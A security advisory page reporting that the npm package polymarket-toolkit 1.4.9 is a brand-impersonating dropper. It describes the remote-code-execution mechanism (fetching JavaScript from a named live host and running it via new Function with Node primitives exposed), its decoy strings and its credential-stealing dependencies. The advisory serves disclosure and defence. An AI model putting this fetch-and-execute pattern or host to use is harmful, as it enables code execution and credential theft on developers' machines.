npm

polymarket-toolkit @1.4.9

Vulnerability report · Last retrieved from osv.dev July 2, 2026 at 1:05 AM UTC

Malicious

OSV ID

MAL-2026-6713

Ecosystem

npm

Summary

Package is published as a Polymarket API client but its default export getPlugin performs unconditional remote code execution on use. On invocation it issues an HTTPS request to https://svganchordev.net/icons/109, takes the data.credits field from the JSON response, and passes it to new Function('require','module',...,'Promise', data.credits) with a context object exposing require , process , Buffer , and related Node primitives, then immediately invokes it. The fetched JavaScript runs with full Node privileges on the installer's machine. The surrounding code is dressed as an icon/CDN helper (variable names IconProvider , iconDomain , a map of cloudflare/fastly/akamai hosts, font-awesome path literals), but those strings are unused decoys; the live request path resolves to the hardcoded svganchordev.net host. Declared dependencies ( @primno/dpapi for Windows DPAPI, better-sqlite3 , node-machine-id ) are consistent with browser-credential and machine-fingerprint extraction and are unrelated to a Polymarket API SDK. Package keywords ( react , helper , svg ) also do not match the advertised purpose. The shape is a brand-impersonating dropper targeting developers searching for a Polymarket toolkit.

Source: amazon-inspector (65aa9243f492d222e1bb036c8ed55fb17268bd987a63ad2ea2aa1b28e44defc3)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.